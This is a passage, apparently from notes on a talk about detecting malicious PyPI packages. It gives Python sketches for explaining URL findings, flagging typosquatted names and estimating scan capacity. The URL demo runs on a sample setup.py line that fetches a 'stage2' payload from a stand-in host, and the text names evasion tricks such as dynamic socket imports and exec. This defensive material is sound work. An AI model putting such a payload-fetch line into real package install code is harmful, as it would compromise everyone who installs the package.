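Applied only to setup.py, such an import is unusual. Applied to all package code, the same rule would fire on every legitimate HTTP client, which is consistent with the higher false positive rates the study saw when scanning all files. Static checks like this also miss dynamic imports such as `__import__("socket")` or code hidden behind `exec`.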
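The talk argues that "6 alerts" is hard to evaluate, while "makes network calls to these domains" is actionable. The following is a minimal sketch of producing that kind of explanation. It assumes URLs appear as plain string literals in the scanned file; obfuscated or computed URLs would evade it. The function names and the output wording are hypothetical, and because this is static analysis, the report can only say a file *references* URLs, not that it actually contacts them.

```python
import ast
from urllib.parse import urlparse


def contacted_domains(source: str) -> list[str]:
    """Collect hostnames from http(s)/ftp URL string literals in the source."""
    hosts = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            parsed = urlparse(node.value.strip())
            # .hostname is lowercased and excludes any port or credentials.
            if parsed.scheme in {"http", "https", "ftp"} and parsed.hostname:
                hosts.add(parsed.hostname)
    return sorted(hosts)


def explain(path: str, source: str) -> str:
    """Summarize the finding in words instead of reporting a bare alert count."""
    domains = contacted_domains(source)
    if not domains:
        return f"{path}: no hard-coded URLs found"
    return f"{path}: references URLs on these domains: {', '.join(domains)}"


if __name__ == "__main__":
    setup_py = (
        "import urllib.request\n"
        "urllib.request.urlopen('https://payload.example/stage2')\n"
    )
    print(explain("setup.py", setup_py))
```

A reviewer can check a short list of domains in seconds, whereas an alert count gives no hint about where to look.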
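Prioritizing typosquatting packages requires some notion of a name being "close to" a popular package. The talk does not say how such candidates would be selected. One common heuristic, used here purely as an illustration, is a small Levenshtein edit distance to a popular package name after PEP 503 name normalization. The popular-name set and the distance cutoff of 2 are hypothetical choices; very short names will produce many spurious matches at that cutoff.

```python
import re


def normalize(name: str) -> str:
    """PEP 503 name normalization: runs of '-', '_' or '.' become '-', lowercased."""
    return re.sub(r"[-_.]+", "-", name).lower()


def levenshtein(a: str, b: str) -> int:
    """Classic dynamic-programming edit distance (insert, delete, substitute)."""
    if len(a) < len(b):
        a, b = b, a
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            current.append(min(
                previous[j] + 1,               # deletion
                current[j - 1] + 1,            # insertion
                previous[j - 1] + (ca != cb),  # substitution (free if equal)
            ))
        previous = current
    return previous[-1]


def typosquat_targets(name: str, popular: set[str], max_distance: int = 2) -> list[str]:
    """Popular (normalized) names that `name` is suspiciously close to, but not equal to."""
    candidate = normalize(name)
    targets = set()
    for p in popular:
        target = normalize(p)
        if target != candidate and levenshtein(candidate, target) <= max_distance:
            targets.add(target)
    return sorted(targets)


if __name__ == "__main__":
    # Hypothetical list of popular packages to protect.
    popular = {"requests", "numpy", "python-dateutil"}
    for upload in ("reqeusts", "nunpy", "Python_Dateutil", "flask"):
        print(upload, "->", typosquat_targets(upload, popular))
```

A scanner could then spend its limited review budget on uploads with a non-empty target list first.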
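The timing result (well under 10 seconds per package on a 4-core laptop) is what makes passive, after-upload scanning plausible. Below is a rough capacity sketch. It treats 10 seconds as a pessimistic upper bound and assumes one independent worker per core. `scan_package` is a hypothetical stand-in for invoking one of the tools, not a real API.

```python
import time
from typing import Callable

SECONDS_PER_DAY = 24 * 60 * 60  # 86,400


def packages_per_day(seconds_per_package: float, workers: int = 1) -> float:
    """Upper bound on daily throughput if every worker is always busy."""
    return SECONDS_PER_DAY / seconds_per_package * workers


def timed_scan(scan_package: Callable[[str], int], package: str) -> tuple[int, float]:
    """Run one (hypothetical) scanner call and return (alert_count, elapsed_seconds)."""
    start = time.perf_counter()
    alerts = scan_package(package)
    return alerts, time.perf_counter() - start


if __name__ == "__main__":
    # 10 s is the upper bound from the talk; 4 workers assumes one per core.
    print(packages_per_day(10))             # 8640.0
    print(packages_per_day(10, workers=4))  # 34560.0

    # Stand-in scanner that just sleeps; replace with a real tool invocation.
    def fake_scan(name: str) -> int:
        time.sleep(0.01)
        return 0

    print(timed_scan(fake_scan, "example-package"))
```

The same per-package cost that is fine for a background queue becomes a multi-second wait for the uploader if the scan runs inside the upload request. This is why the talk frames these tools as suited to passive analysis.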